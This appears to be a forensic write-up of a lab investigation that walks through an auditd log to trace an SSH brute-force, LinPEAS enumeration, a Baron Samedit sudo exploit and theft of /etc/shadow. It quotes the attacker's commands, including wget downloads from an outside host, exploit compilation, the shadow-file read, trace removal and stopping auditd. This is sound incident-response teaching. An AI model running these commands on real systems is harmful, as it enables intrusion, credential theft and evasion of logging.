An 83,000-line audit.log file is provided for analysis. The investigation centres on identifying how an attacker gained initial access, how they escalated privileges, and what they took on the way out. The primary tool for parsing Linux auditd logs is aureport, which translates dense key=value records into readable reports.
The first step is getting a summary of the log to understand what event types are present:
aureport -if audit.log --summary
The output immediately tells a story — 87 failed logins against a single successful one, 89 failed authentications, and a 6-minute window covering the entire incident from 05/10/21 11:22:07 to 11:28:06. Over 100 unique executables and 192 commands confirm significant post-exploitation activity.
Pulling the failed login report:
aureport -if audit.log --login --failed
All failures originate from 192[.]168[.]4[.]155, targeting the btlo account via SSH. After 87 failed attempts the attacker eventually succeeded, with the successful login recorded at 11:23:16:
aureport -if audit.log --login --success
The compromised account is confirmed as btlo (UID 1001), visible in USER_AUTH events:
grep -aoP 'acct="[^"]+"' audit.log | sort -u
With a foothold established, the attacker immediately pulled down LinPEAS from their own HTTP server:
grep -a "linpeas" audit.log
a0="wget" a1="-O" a2="-" a3="hxxp[://]192[.]168[.]4[.]155:8000/linpeas.sh"
The characteristic LinPEAS execution signature is visible in the EXECVE records — thousands of calls to grep, sed, cut, awk, find, id, env, and whoami in rapid succession, along with a massive find sweep hunting for credential files, config files, SSH keys, and database configs across the filesystem.
After enumeration, the attacker downloaded a pre-packaged exploit archive from their HTTP server, compiled it on the box, and executed it:
grep -a "evil" audit.log
The full attack chain is visible in the logs:
wget http://192.168.4.155:8000/evil.tar.gz
tar zxvf evil.tar.gz
gcc -o evil hax.c
./evil 0
The binary evil was compiled from hax.c — a PoC for CVE-2021-3156, also known as Baron Samedit. This is a heap-based buffer overflow in sudo’s argument handling, triggerable via sudoedit. It affects sudo versions prior to 1.9.5p2 and allows any local user to gain full root privileges without requiring a password. The SYSCALL record confirms execution under auid=1001 (btlo) with pid=829992.
With root access achieved, the attacker read /etc/shadow — the hashed password file readable only by root:
a0="cat" a1="/etc/shadow"
This provides offline cracking material for all local accounts on the system.
Before disconnecting, the attacker removed all traces of the exploit:
rm -rf /home/btlo/evil
rm /home/btlo/evil.tar.gz
The attacker also issued service auditd stop (decoded from hex in the USER_CMD records) in an attempt to halt further logging.
| Type | Value |
|---|---|
| IP — Attacker | 192[.]168[.]4[.]155 |
| Compromised Account | btlo |
| Attacker HTTP Server | hxxp[://]192[.]168[.]4[.]155:8000 |
| Enumeration Tool | linpeas.sh |
| Exploit Archive | evil.tar.gz |
| Exploit Binary | /home/btlo/evil/evil |
| Exploit Source | hax.c |
| CVE | CVE-2021-3156 |
| Exfiltrated File | /etc/shadow |